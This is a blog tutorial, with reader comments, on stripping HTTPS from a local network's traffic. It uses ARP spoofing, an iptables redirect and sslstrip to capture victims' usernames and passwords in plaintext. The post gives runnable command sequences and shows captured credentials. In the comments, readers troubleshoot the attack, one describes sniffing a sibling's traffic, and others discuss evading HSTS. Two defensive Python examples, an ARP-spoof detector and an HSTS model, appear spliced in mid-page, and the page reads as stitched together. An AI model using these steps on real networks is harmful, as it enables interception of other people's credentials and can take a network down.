Break SSL Protection Using SSLStrip and Backtrack 5


Type : Tutorial

Level : Medium, Advanced

Some people ask: "Are you sure SSL (Secure Socket Layer) on port 443 can be hacked, so that we can see the password sent over the network?" So, how do you break SSL protection using sslstrip?

What is SSL?

For more information about this, see my previous tutorial about SSL and HTTPS.

As I explained in that post, breaking the SSL encryption itself is rather hard. In this tutorial I will explain how to get at the protected data without breaking the SSL encryption at all, using a Man in the Middle attack :-).

Man in the Middle Attack

What is a Man in the Middle attack? I have already written about it in my previous post, "Hacking Facebook Using Man in the Middle Attack".

Requirement :

1. Linux OS

2. Arpspoof

3. IPTables

4. SSLStrip

5. NetStat

All of these requirements may have further package dependencies. I suggest using Backtrack Linux to make this tutorial easier, because all of the required packages are already installed in Backtrack Linux (except SSLStrip).

Perform the Attack – Man in the Middle Attack

1. Configure your Linux box so that it can forward packets that arrive on it (enable IP forwarding).

echo '1' > /proc/sys/net/ipv4/ip_forward

This gives your Backtrack machine the ability to forward packets that were not intended for it.

2. Know your network gateway

netstat -nr

[Screenshot: netstat -nr output showing the routing table and gateway]

For example, I already know that my gateway address is 192.168.8.8.

3. Use arpspoof to perform the Man in the Middle attack

arpspoof -i eth0 192.168.8.8

a. Change "eth0" to the network interface that is currently connected to the network. Usually it is eth0 or wlan0.

b. Change "192.168.8.8" to your network's default gateway.

c. In this tutorial I run arpspoof against the entire network. Be careful if your network has a large number of connected users, because it can overload the network and bring it down.

SSL Strip

Created by Moxie Marlinspike, who presented a demonstration of the HTTPS stripping attacks at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. -Taken from the author's website-

This all happens on the fly and is practically invisible to users. The only way to notice is to check the URL in the address bar: where it would normally display HTTPS, it now displays HTTP instead.

Install SSL Strip (optional)

1. Download SSL Strip

2. tar zxvf sslstrip-0.9.tar.gz

3. cd sslstrip-0.9

4. python setup.py install


1. We need to set up a firewall rule (using iptables) that redirects requests for port 80 to port 8080, so that the connections SSL Strip is listening for get routed to the proper port.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

2. After setting up iptables, the next step is to redirect all of the network's HTTP traffic through our computer using arpspoof (don't forget to enable IP forwarding first):

echo '1' > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 192.168.8.8

[Screenshot: arpspoof output while it is running]

3. When everything is running well, you will see arpspoof sending its packets. The next step is to start SSL Strip in a new terminal (CTRL+ALT+T):

sslstrip -l 8080

"-l" tells sslstrip to listen on the specified port.

[Screenshot: sslstrip running and waiting for connections]

The picture above shows that SSL Strip is already running and waiting for the victim to open an SSL URL such as https://mail.google.com, https://mail.yahoo.com, etc.

As the victim, I will try to open https://mail.live.com. When I open the page, what I see looks like the picture below.

[Screenshot: the victim's browser showing the mail.live.com page over http://]

The URL changed into HTTP. :-)

4. After SSL Strip has captured enough data, stop arpspoof and SSL Strip with CTRL + C. After you stop them, the whole network will be down and cannot be accessed for a while (it shouldn't take long). This happens because arpspoof does not automatically repopulate the victims' ARP tables with the router's proper MAC address.

5. Inside the folder you started SSL Strip from there will be a new file, "sslstrip.log", that stores all of the information captured over HTTP and even HTTPS. Just open the file in your favorite text editor. The picture below shows the content of my sslstrip.log, which captured the victim's data when they opened https://mail.live.com.

[Screenshot: contents of sslstrip.log with the captured login]

You can see the plain data of username and password there.

 

Prevention of SSL Strip Attack

1. If you are on a public network (internet cafe, unsecured hotspot, etc.), minimize logging in to your personal accounts.

2. Use SSH tunneling (you can see the tutorial here).

3. Keep your eyes open and check the address bar.

This fake URL address: [Screenshot: address bar showing the stripped page over http://]

is different from this one: [Screenshot: address bar showing the genuine page over https://]
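One way to notice the ARP spoofing step this attack depends on, from the victim's side: an added example (not code from the tutorial) that compares two snapshots of the client's ARP cache and flags the gateway entry changing MAC, going incomplete, or sharing a MAC with another host on the LAN. The ARP table lines it parses are constructed; the gateway IP 192.168.8.8 is the one used in the tutorial; live_arp_table assumes the net-tools arp binary is installed.

```python
"""Client-side check for the ARP-cache symptoms of a gateway spoof (added
example, not the tutorial's own code). Parses `arp -n` style output; the
snapshots at the bottom are constructed."""
import re
import subprocess
from typing import Dict, List

# Complete entry: "192.168.8.8   ether   00:11:22:33:44:55   C   eth0"
ARP_LINE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+ether\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})\b", re.I)

def parse_arp_table(text: str) -> Dict[str, str]:
    """Map IP -> lowercase MAC; '(incomplete)' rows have no MAC and are skipped."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def live_arp_table() -> Dict[str, str]:
    """Snapshot the real cache (assumes the net-tools `arp` binary is installed)."""
    out = subprocess.run(["arp", "-n"], capture_output=True, text=True, check=True).stdout
    return parse_arp_table(out)

def check_gateway(baseline: Dict[str, str], current: Dict[str, str], gateway_ip: str) -> List[str]:
    """Return findings that point at an ARP spoof of the default gateway."""
    findings: List[str] = []
    old, new = baseline.get(gateway_ip), current.get(gateway_ip)
    if old and new is None:
        # Seen when arpspoof stops: the gateway entry stays incomplete until
        # the real router's MAC is learned again (the stall the tutorial mentions).
        findings.append(f"gateway {gateway_ip} has no complete ARP entry")
    elif old and new and old != new:
        findings.append(f"gateway {gateway_ip} MAC changed {old} -> {new}")
    if new:
        # arpspoof answers with the attacker's own MAC, so the gateway IP and
        # another LAN host end up sharing one hardware address.
        twins = sorted(ip for ip, mac in current.items() if mac == new and ip != gateway_ip)
        if twins:
            findings.append(f"gateway MAC {new} is also used by {', '.join(twins)}")
    return findings

# Constructed snapshots: baseline from a trusted session, then one where
# 192.168.8.8 (the gateway IP from the tutorial) answers with 192.168.8.20's MAC.
BASELINE = """192.168.8.8   ether   00:11:22:33:44:55   C   eth0
192.168.8.20  ether   aa:bb:cc:dd:ee:ff   C   eth0
"""
SPOOFED = """192.168.8.8   ether   aa:bb:cc:dd:ee:ff   C   eth0
192.168.8.20  ether   aa:bb:cc:dd:ee:ff   C   eth0
192.168.8.30          (incomplete)            eth0
"""
```

Take the baseline on a network you trust and re-run check_gateway periodically; a finding does not prove an attack (a replaced router also changes the MAC), but it is exactly what this tutorial's arpspoof step produces on every victim.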

 

Remember This !

Be wise when using this application, and don't be shocked if it also helps you get to jail faster if you use it for a purpose the law does not allow.

Regards : Vishnu Valentino


Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

Website: http://www.vishnuvalentino.com


  • http://www.ehacking.net Ethical Hacking

    It's done, check this out: http://www.ehacking.net/2011/06/crack-ssl-using-sslstrip-with.html

  • http://reversecalllookupx.com/ reverse call lookup

    Thanks for the article, first time seeing your site. I would love to contribute more in the future.

  • http://reversecalllookupx.com/ reverse call lookup

    Thanks for the informative post.. and thanks for adding my comment to the blog.

  • saurabh msihra

    It doesn't work in Google Chrome

  • saurabh msihra

    and YouTube also doesn't buffer the video

  • chard

    Thanks Vishnu, I ran an update/upgrade and it works now. Can you do me a little favor? I know this is the wrong forum, but would you answer my question? I'm having trouble with sslstrip. It's updated, and I don't think I must download a newer version of sslstrip because when I updated Backtrack it came along (new version), I think. My problem is that when I type sslstrip -l 10000 it says sslstrip: command not found? It's not found? But it's installed and it's updated. Do I have to enable it or something? I can't get it. Please help me Vishnu, hoping for your response.


    • http://www.vishnuvalentino.com v4L

      #chard
      you should go to the sslstrip folder….. try to find it using whereis sslstrip, or search for the sslstrip command and run it from there.

  • 3n1gma

    Now I've had issues in the past with sslstrip on Backtrack 5. I can never get it to capture data. I've used all of the recommended changes. All of the commands have been followed to the letter. Yet still there is nothing. Now I can perform MITM attacks all day. I just can't get sslstrip to work. SMDH!!! What am I doing wrong???? :-(

  • Amnesiac

    Hi, I tried everything in this post, even tried different posts, but I can't get the sslstrip program to capture anything. It runs fine, I have set my iptables and ports, arpspoof's working and I also use ettercap, but when I get to the point of actually getting the packets I get nothing, I just get this:

    “sslstrip 0.9 by Moxie Marlinspike running…”

    and it doesn't capture anything. Any ideas??? I'm using Backtrack 5.

    • http://www.vishnuvalentino.com v4L

      #Amnesiac
      Which network do you run it on?

  • Dorky

    After entering netstat -nr there's no gateway output, it only says Kernel IP routing table, gateway etc.

    • http://www.vishnuvalentino.com v4L

      #Dorky
      maybe you haven’t set your gateway yet…

  • Dorky

    Can you tell me how to set it? I just followed the echo '1' command, then typed netstat -nr and then all is blank

    • http://www.vishnuvalentino.com v4L

      #Dorky
      Something like route add default gw 192.168.1.0

  • monkeyPhisher

    sslstrip v0.9 has errors in it, go back to v0.8 or v0.6

  • hueyii

    I can't get the iptables command to work. It returns the error:
    iptables: No chain/target/match by that name
    (I booted from the Backtrack5 CD)

    • http://www.vishnuvalentino.com v4L

      #hueyii
      Did you already configure your network address?
      Try running iptables -L to list the table

  • Dorky

    I have successfully run sslstrip. If I bring my laptop to a wifi area will it sniff automatically?

    • http://www.vishnuvalentino.com v4L

      #Dorky
      No you can't, you should have a wi-fi card that supports promiscuous mode…

  • hueyii

    Since I posted the question, I have installed BT5 to my hard drive. I have made no modifications. When I list iptables it looks like nothing's configured?
     
    root@bt:~# iptables -L
    Chain INPUT (policy ACCEPT)
    target     prot opt source               destination
    Chain FORWARD (policy ACCEPT)
    target     prot opt source              destination
    Chain OUTPUT (policy ACCEPT)
    target     prot opt source               destination
     
    Do I need to configure iptables first?

  • hueyii

    I created basic rules with iptables.  Now iptables -L returns:
    Chain INPUT (policy ACCEPT)
    target     prot opt source               destination
    ACCEPT     tcp  --  anywhere             anywhere            state ESTABLISHED
    ACCEPT     udp  --  anywhere             anywhere            state ESTABLISHED
    ACCEPT     icmp --  anywhere             anywhere            state RELATED,ESTABLISHED
    DROP       all  --  anywhere             anywhere
    Chain FORWARD (policy ACCEPT)
    target     prot opt source               destination
    Chain OUTPUT (policy ACCEPT)
    target     prot opt source               destination
    ACCEPT     tcp  --  anywhere             anywhere            state NEW,ESTABLISHED
    ACCEPT     udp  --  anywhere             anywhere            state NEW,ESTABLISHED
    ACCEPT     icmp --  anywhere             anywhere            state NEW,RELATED,ESTABLISHED
    but I still get the same error :(

  • hueyii

    oops.  I had a typo in the iptables command.
     
    Thx

  • hueyii

    It worked. Thanks. One thing to note is that with Backtrack 5 I had to use the following procedure. It's the same, but there were differences in the sslstrip location as well as the resulting sslstrip.log
    echo 'turn on ipforwarding'
    echo '1' > /proc/sys/net/ipv4/ip_forward
    echo 'the next line spoofs the subnets default gateway'
    arpspoof -i eth0 192.168.255.254
    echo 'Run this in a separate console.  It will redirect packets received on port 80 to port 8080 where sslstrip will be listening'
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    echo 'Start sslstrip on port 8080'
    python /pentest/web/sslstrip/sslstrip.py -l 8080

    echo 'When finished, use ctrl-c to kill arpspoof and sslstrip. Look for what was captured in sslstrip.log.  I found this in the root folder'
     

  • mukul

    I am using BT R2 with VMware and this is not saving data in sslstrip.log

    • http://www.vishnuvalentino.com v4L

      #mukul
      hmm…when you run sslstrip, the logfile should be saved inside the folder you run the sslstrip application.

  • Bobby

    I have the same problem as Mukul. I am using BT R2 with VMware and this is not saving log data. I tried to create a new logfile (such as abc.log) but it's an empty file. I have the virtual machine using BT R2 and my laptop uses Win7. I tried to break ssl on my Win7 laptop, but it's successful. I can not access https on my laptop when arpspoof and sslstrip are running on the VM. Can you give me any advice?

    • http://www.vishnuvalentino.com v4L

      #Bobby
      Are there any error messages appearing in your sslstrip.log?

  • http://pensilendy.blogspot.com Endi

    thanks for the tuts man

    • http://www.vishnuvalentino.com v4L

      #Endi
      You’re welcome

  • Stephan S

    Unfortunately not such a big security issue anymore since HSTS, https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
     
    Have you found any way to circumvent this?

    • http://www.vishnuvalentino.com v4L

      #Stephan
      Have no idea yet :-) but out there there are still a lot of users who won't update their browsers or OS; maybe some vendors have already applied it, but not all users have migrated to the new one :-P

    • Stephen Smith

      I don’t think it’s hard to get around. They recommend using 301 redirects, which already can be exploited by sslstrip. I’m pretty sure SSLStrip could be modified to take out the HSTS header because that would be sent insecurely as well.

    • http://denzuko.computekindustries.com/ Master Den Zuko

      MITM attacks and TLS decoding are at Layer 3 and Layer 6 of the OSI Model; HTTP headers are Layer 7. Therefore, HSTS is already compromised at this level since you are already sending HTTP headers after the TLS session was decoded.
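The HSTS mechanism discussed in this thread, as an added example (written for this page, not by the post's author or any commenter): a minimal model of a browser's HSTS store showing that once a policy has been received over HTTPS, an http:// navigation is upgraded before any request leaves the client, while a first visit with no stored policy, or an expired one, still goes out in the clear. The HstsStore class and the header values are constructed; parsing follows RFC 6797.

```python
"""Minimal model of a browser HSTS store (RFC 6797), constructed for this
example. Shows what a stripping proxy can and cannot influence."""
from typing import Dict, Tuple
from urllib.parse import urlsplit, urlunsplit

class HstsStore:
    def __init__(self) -> None:
        # host -> (expiry timestamp, includeSubDomains flag)
        self.policies: Dict[str, Tuple[float, bool]] = {}

    def observe_response(self, url: str, headers: Dict[str, str], now: float) -> bool:
        """Record a policy. Returns True if one was stored or cleared."""
        parts = urlsplit(url)
        # Only a response received over HTTPS may set policy, so the header
        # on a stripped plain-HTTP page is ignored (RFC 6797 section 8.1).
        if parts.scheme != "https":
            return False
        value = next((v for k, v in headers.items() if k.lower() == "strict-transport-security"), None)
        if value is None:
            return False
        max_age, include_sub = None, False
        for directive in value.split(";"):
            name, _, arg = directive.strip().partition("=")
            name = name.strip().lower()
            if name == "max-age":
                try:
                    max_age = int(arg.strip().strip('"'))
                except ValueError:
                    return False  # malformed directive: ignore the whole header
            elif name == "includesubdomains":
                include_sub = True
        if max_age is None:
            return False
        host = parts.hostname.lower()
        if max_age == 0:
            self.policies.pop(host, None)  # max-age=0 revokes the policy
        else:
            self.policies[host] = (now + max_age, include_sub)
        return True

    def is_known_host(self, host: str, now: float) -> bool:
        host = host.lower()
        for known, (expiry, include_sub) in self.policies.items():
            if expiry > now and (host == known or (include_sub and host.endswith("." + known))):
                return True
        return False

    def navigate(self, url: str, now: float) -> str:
        """URL the client actually requests: http:// becomes https:// for a known
        host before any packet leaves, so the proxy never sees a plain request."""
        parts = urlsplit(url)
        if parts.scheme == "http" and parts.hostname and self.is_known_host(parts.hostname, now):
            return urlunsplit(("https", parts.netloc, parts.path, parts.query, parts.fragment))
        return url
```

The remaining gap is the first visit before any policy exists, which is why browsers ship preload lists for sites that opt in.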

  • vishal

    Dude, when I type ipconfig ..
    it shows something like this ..
    No command ‘ipconfig’ found, did you mean:
    Command ‘tpconfig’ from package ‘tpconfig’ (universe)
    Command ‘iwconfig’ from package ‘wireless-tools’ (main)
    Command ‘ifconfig’ from package ‘net-tools’ (main)
    ipconfig: command not found
    any solution ??

    • richard

      it should be
      ifconfig or ipconfig

      ipconfig works only in windows ..

    • http://denzuko.computekindustries.com/ Master Den Zuko

      ipconfig is microsoft, the unix(bsd,linux,osx,…) equivalent is ifconfig(1) or ip(1) [the (1) denotes the manual page number: ie man 1 ip or man 1 ifconfig]

  • Dorky

    I have tried a lot of sslstrip commands but still no log in sslstrip.log. My card can sniff pics using driftnet and crack WPA2 keys, but no log after running sslstrip. Help!

  • Ricardo

    It isn't working when I type arpspoof -i eth0 192.168.1.1 nor -i wlan0… what am I doing wrong?

  • http://www.hacking-tutorial.com/ v4L

    #Ricardo
    you can add -t switch for target IP.
    for wlan, your wifi card should support promiscuous mode

    • Ricardo

      Thanks! I'm really a newbie about these things but I love studying it.
      I'm reading this page every day and I'm almost there !!!! :P

      Also reading others, but there are different syntaxes…

      What I did, step by step:
      echo 1 > /proc/sys/net/ipv4/ip_forward;
      arpspoof -i wlan0 -t 192.168.1.6 192.168.8.8;
      in another tab:

      echo 1 > /proc/sys/net/ipv4/ip_forward;
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080;
      sslstrip -l 8080;

      After all that, I open sslstrip.log and get my brother's encrypted post.
      I should be able to read it, shouldn't I?
      Thanks again

      • Ricardo

        ah, those IPs above were just examples, I wrote them right…

        • Ricardo

          GOT IT !!!!!!

          but it didn't work with FB

      • cobra

        echo 1 > /proc/sys/net/ipv4/ip_forward

        arpspoof -i eth0 -t victimip default_gateway_ip

        example: arpspoof -i eth0 -t 192.168.1.249 192.168.1.1 (the eth0 could be wlan0, it depends on how you are connected; this one is for a specific client, the "victim")

        *this is for the whole network: arpspoof -i eth0 192.168.1.1* "everyone on it"

        iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

        sslstrip -l 10000

        tail -n 50 -f sslstrip.log

        This should now show you the results of the SSL strip attack.

        All of this is done using Kali Linux, good luck.

        • Ricardo

          I've got it!

          but there's a problem…..
          when the target types "face" and then autocompletes, this way will take him to https..
          or if the target searches for face on google and then clicks on the link, this way also will bring him to https…..

          the only way I've got is: when the target types the whole page "www.facebook.com"

          ** it doesn't happen with gmail, ymail, hotmail etc because they bring us only http :D not https like face….

          I was wondering if we could spoof their dns or url but I haven't got it yet ://

  • MioSan389

    v4l, can we also use a VPN to protect our connection in public..? and what's the difference between them (SSH and VPN)

    • http://www.vishnuvalentino.com Vishnu Valentino

      @MioSan389

      Yes you can use VPN too.

      VPN = Virtual Private Network usually used to secure connection between one endpoint and other point through public connection.

      SSH = Secure Shell usually used to secure connection between client and server directly (ssh client and ssh server).

  • Michael Roberts

    les -t nat -A where do I find info on all this syntax, how and what it means?